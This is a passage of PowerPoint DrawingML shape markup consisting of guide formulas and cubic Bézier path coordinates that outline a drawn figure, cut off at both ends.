                <a:gd name="T43" fmla="*/ 71 h 209"/>
                <a:gd name="T44" fmla="*/ 102 w 179"/>
                <a:gd name="T45" fmla="*/ 67 h 209"/>
                <a:gd name="T46" fmla="*/ 73 w 179"/>
                <a:gd name="T47" fmla="*/ 79 h 209"/>
                <a:gd name="T48" fmla="*/ 63 w 179"/>
                <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                <a:gd name="T68" fmla="*/ 119 w 179"/>
                <a:gd name="T69" fmla="*/ 171 h 209"/>
                <a:gd name="T70" fmla="*/ 126 w 179"/>
                <a:gd name="T71" fmla="*/ 145 h 209"/>
                <a:gd name="T72" fmla="*/ 126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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="176"/>
                    <a:pt x="179" y="179"/>
                    <a:pt x="176" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="185"/>
                    <a:pt x="170" y="187"/>
                    <a:pt x="166" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="193"/>
                    <a:pt x="148" y="199"/>
                    <a:pt x="141" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="207"/>
                    <a:pt x="137" y="208"/>
                    <a:pt x="134" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="209"/>
                    <a:pt x="128" y="208"/>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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="18" y="198"/>
                    <a:pt x="11" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="5" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="1" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="186"/>
                    <a:pt x="2" y="185"/>
                    <a:pt x="2" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="180"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="3" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="170"/>
                    <a:pt x="2" y="168"/>
                    <a:pt x="2" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="162"/>
                    <a:pt x="3" y="160"/>
                    <a:pt x="7" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="12" y="159"/>
                    <a:pt x="14" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="158"/>
                    <a:pt x="22" y="154"/>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3"/>
                    <a:pt x="4" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="169"/>
                    <a:pt x="6" y="170"/>
                    <a:pt x="6" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="176"/>
                    <a:pt x="8" y="179"/>
                    <a:pt x="6" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="184"/>
                    <a:pt x="5" y="186"/>
                    <a:pt x="4" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="190"/>
                    <a:pt x="4" y="191"/>
                    <a:pt x="7" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="193"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="13" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="196"/>
                    <a:pt x="35" y="199"/>
                    <a:pt x="45" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="203"/>
                    <a:pt x="52" y="204"/>
                    <a:pt x="55" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="202"/>
                    <a:pt x="66" y="197"/>
                    <a:pt x="65" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="185"/>
                    <a:pt x="62" y="182"/>
                    <a:pt x="60" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="169"/>
                    <a:pt x="49" y="160"/>
                    <a:pt x="42" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="149"/>
                    <a:pt x="37" y="147"/>
                    <a:pt x="35" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="143"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="27" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="145"/>
                    <a:pt x="25" y="144"/>
                    <a:pt x="25" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="136"/>
                    <a:pt x="25" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="132"/>
                    <a:pt x="26" y="131"/>
                    <a:pt x="27" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="124"/>
                    <a:pt x="32" y="118"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="106"/>
                    <a:pt x="39" y="99"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="90"/>
                    <a:pt x="49" y="86"/>
                    <a:pt x="52" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="80"/>
                    <a:pt x="56" y="76"/>
                    <a:pt x="58" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="70"/>
                    <a:pt x="60" y="67"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="57"/>
                    <a:pt x="59" y="51"/>
                    <a:pt x="59" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="38"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="16"/>
                    <a:pt x="63" y="8"/>
                    <a:pt x="73" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="97" y="1"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="6"/>
                    <a:pt x="114" y="11"/>
                    <a:pt x="117" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="23"/>
                    <a:pt x="122" y="29"/>
                    <a:pt x="122" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="39"/>
                    <a:pt x="122" y="43"/>
                    <a:pt x="123" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="61"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="138" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="97"/>
                    <a:pt x="156" y="112"/>
                    <a:pt x="159" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="133"/>
                    <a:pt x="161" y="138"/>
                    <a:pt x="160" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="144"/>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="147"/>
                    <a:pt x="158" y="147"/>
                    <a:pt x="157" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="154" y="150"/>
                    <a:pt x="153" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="154"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="147" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="160"/>
                    <a:pt x="139" y="160"/>
                    <a:pt x="135" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="158"/>
                    <a:pt x="132" y="157"/>
                    <a:pt x="131" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="153"/>
                    <a:pt x="129" y="152"/>
                    <a:pt x="128" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="149"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="125" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="148"/>
                    <a:pt x="122" y="149"/>
                    <a:pt x="121" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="120" y="159"/>
                    <a:pt x="121" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="170"/>
                    <a:pt x="123" y="178"/>
                    <a:pt x="122" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="188"/>
                    <a:pt x="121" y="191"/>
                    <a:pt x="122" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="201"/>
                    <a:pt x="129" y="204"/>
                    <a:pt x="136" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="201"/>
                    <a:pt x="142" y="199"/>
                    <a:pt x="144" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="165" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="185"/>
                    <a:pt x="170" y="183"/>
                    <a:pt x="173" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="182"/>
                    <a:pt x="174" y="181"/>
                    <a:pt x="175" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="179"/>
                    <a:pt x="176" y="178"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="175"/>
                    <a:pt x="172" y="174"/>
                    <a:pt x="171" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="173"/>
                    <a:pt x="169" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="171"/>
                    <a:pt x="161" y="167"/>
                    <a:pt x="160" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="160"/>
                    <a:pt x="160" y="157"/>
                    <a:pt x="160" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="154"/>
                    <a:pt x="160" y="153"/>
                    <a:pt x="161" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="74" y="73"/>
                    <a:pt x="77" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="74"/>
                    <a:pt x="85" y="73"/>
                    <a:pt x="88" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="68"/>
                    <a:pt x="98" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="66"/>
                    <a:pt x="100" y="65"/>
                    <a:pt x="101" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="65"/>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="67"/>
                    <a:pt x="102" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="68"/>
                    <a:pt x="100" y="69"/>
                    <a:pt x="99" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="71"/>
                    <a:pt x="91" y="74"/>
                    <a:pt x="87" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="78"/>
                    <a:pt x="83" y="79"/>
                    <a:pt x="81" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="82"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="73" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="67" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="70"/>
                    <a:pt x="66" y="70"/>
                    <a:pt x="65" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="72"/>
                    <a:pt x="64" y="74"/>
                    <a:pt x="63" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="79"/>
                    <a:pt x="61" y="81"/>
                    <a:pt x="60" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="86"/>
                    <a:pt x="57" y="88"/>
                    <a:pt x="57" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="94"/>
                    <a:pt x="58" y="96"/>
                    <a:pt x="58" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="98"/>
                    <a:pt x="57" y="99"/>
                    <a:pt x="56" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="104"/>
                    <a:pt x="52" y="108"/>
                    <a:pt x="50" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="117"/>
                    <a:pt x="46" y="122"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="130"/>
                    <a:pt x="46" y="133"/>
                    <a:pt x="46" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="137"/>
                    <a:pt x="45"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1"/>
                    <a:pt x="38" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="121"/>
                    <a:pt x="37" y="122"/>
                    <a:pt x="37" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="127"/>
                    <a:pt x="35" y="131"/>
                    <a:pt x="36"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4"/>
                    <a:pt x="67" y="176"/>
                    <a:pt x="64" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="177"/>
                    <a:pt x="63" y="177"/>
                    <a:pt x="62" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="179"/>
                    <a:pt x="65" y="181"/>
                    <a:pt x="66" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="185"/>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2"/>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3" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="173"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="115" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="172"/>
                    <a:pt x="116" y="173"/>
                    <a:pt x="117" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="178"/>
                    <a:pt x="117" y="182"/>
                    <a:pt x="115" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="188"/>
                    <a:pt x="114" y="190"/>
                    <a:pt x="114" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="114" y="195"/>
                    <a:pt x="116" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="191"/>
                    <a:pt x="118" y="186"/>
                    <a:pt x="119" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="178"/>
                    <a:pt x="120" y="174"/>
                    <a:pt x="119" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="167"/>
                    <a:pt x="118" y="163"/>
                    <a:pt x="118" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="156"/>
                    <a:pt x="118" y="153"/>
                    <a:pt x="119" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="122" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="142"/>
                    <a:pt x="129" y="140"/>
                    <a:pt x="132" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="137"/>
                    <a:pt x="141" y="138"/>
                    <a:pt x="146" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="138"/>
                    <a:pt x="142" y="137"/>
                    <a:pt x="140" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="119"/>
                    <a:pt x="135" y="97"/>
                    <a:pt x="126" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="97"/>
                    <a:pt x="134" y="103"/>
                    <a:pt x="136" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="116"/>
                    <a:pt x="140" y="123"/>
                    <a:pt x="139" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="135"/>
                    <a:pt x="136" y="137"/>
                    <a:pt x="132" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="128" y="137"/>
                    <a:pt x="128" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="132"/>
                    <a:pt x="127" y="130"/>
                    <a:pt x="127" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="121"/>
                    <a:pt x="126" y="114"/>
                    <a:pt x="124" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="102"/>
                    <a:pt x="121" y="98"/>
                    <a:pt x="117" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="86"/>
                    <a:pt x="112" y="79"/>
                    <a:pt x="107" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="70"/>
                    <a:pt x="105" y="67"/>
                    <a:pt x="106" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="62"/>
                    <a:pt x="106" y="60"/>
                    <a:pt x="107" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="55"/>
                    <a:pt x="106" y="54"/>
                    <a:pt x="104" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="52"/>
                    <a:pt x="97" y="50"/>
                    <a:pt x="94" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="48"/>
                    <a:pt x="91" y="46"/>
                    <a:pt x="91" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="43"/>
                    <a:pt x="91" y="41"/>
                    <a:pt x="92" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="37"/>
                    <a:pt x="95" y="36"/>
                    <a:pt x="98" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="101" y="38"/>
                    <a:pt x="102" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="42"/>
                    <a:pt x="103" y="45"/>
                    <a:pt x="102" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="48"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="102" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="51"/>
                    <a:pt x="107" y="50"/>
                    <a:pt x="107" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="43"/>
                    <a:pt x="107" y="39"/>
                    <a:pt x="105" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="31"/>
                    <a:pt x="100" y="29"/>
                    <a:pt x="96" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="30"/>
                    <a:pt x="88" y="33"/>
                    <a:pt x="87" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="39"/>
                    <a:pt x="87" y="40"/>
                    <a:pt x="87" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="43"/>
                    <a:pt x="87" y="45"/>
                    <a:pt x="87" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="45"/>
                    <a:pt x="83" y="45"/>
                    <a:pt x="81" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="46"/>
                    <a:pt x="78" y="45"/>
                    <a:pt x="78" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="41"/>
                    <a:pt x="77" y="38"/>
                    <a:pt x="76" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="35"/>
                    <a:pt x="76" y="34"/>
                    <a:pt x="76" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="32"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="70" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="31"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="66" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="39"/>
                    <a:pt x="63" y="44"/>
                    <a:pt x="66" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="50"/>
                    <a:pt x="67" y="51"/>
                    <a:pt x="68" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="69" y="50"/>
                    <a:pt x="69" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="48"/>
                    <a:pt x="68" y="48"/>
                    <a:pt x="67" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="45"/>
                    <a:pt x="65" y="42"/>
                    <a:pt x="66" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="37"/>
                    <a:pt x="71" y="36"/>
                    <a:pt x="73" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="39"/>
                    <a:pt x="75" y="42"/>
                    <a:pt x="75" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="46"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="72" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="51"/>
                    <a:pt x="69" y="52"/>
                    <a:pt x="66" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="54"/>
                    <a:pt x="65" y="55"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="64" y="58"/>
                    <a:pt x="65" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="60"/>
                    <a:pt x="67" y="61"/>
                    <a:pt x="68" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="66"/>
                    <a:pt x="74" y="66"/>
                    <a:pt x="78" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="66"/>
                    <a:pt x="87" y="64"/>
                    <a:pt x="91" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="98" y="61"/>
                    <a:pt x="101" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="58"/>
                    <a:pt x="102" y="57"/>
                    <a:pt x="103" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="58"/>
                    <a:pt x="103" y="59"/>
                    <a:pt x="103" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="60"/>
                    <a:pt x="102" y="61"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="63"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="86" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="69"/>
                    <a:pt x="78" y="69"/>
                    <a:pt x="74" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="68"/>
                    <a:pt x="72" y="68"/>
                    <a:pt x="71" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="43"/>
                    <a:pt x="73" y="41"/>
                    <a:pt x="72" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="39"/>
                    <a:pt x="71" y="39"/>
                    <a:pt x="70" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="41"/>
                    <a:pt x="71" y="42"/>
                    <a:pt x="71" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="44"/>
                    <a:pt x="72" y="45"/>
                    <a:pt x="73" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="41"/>
                    <a:pt x="100" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="43"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="101" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="100" y="40"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98"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446"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5762" y="1153"/>
              <a:ext cx="3" cy="4"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 2"/>
                <a:gd name="T1" fmla="*/ 1 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 2"/>
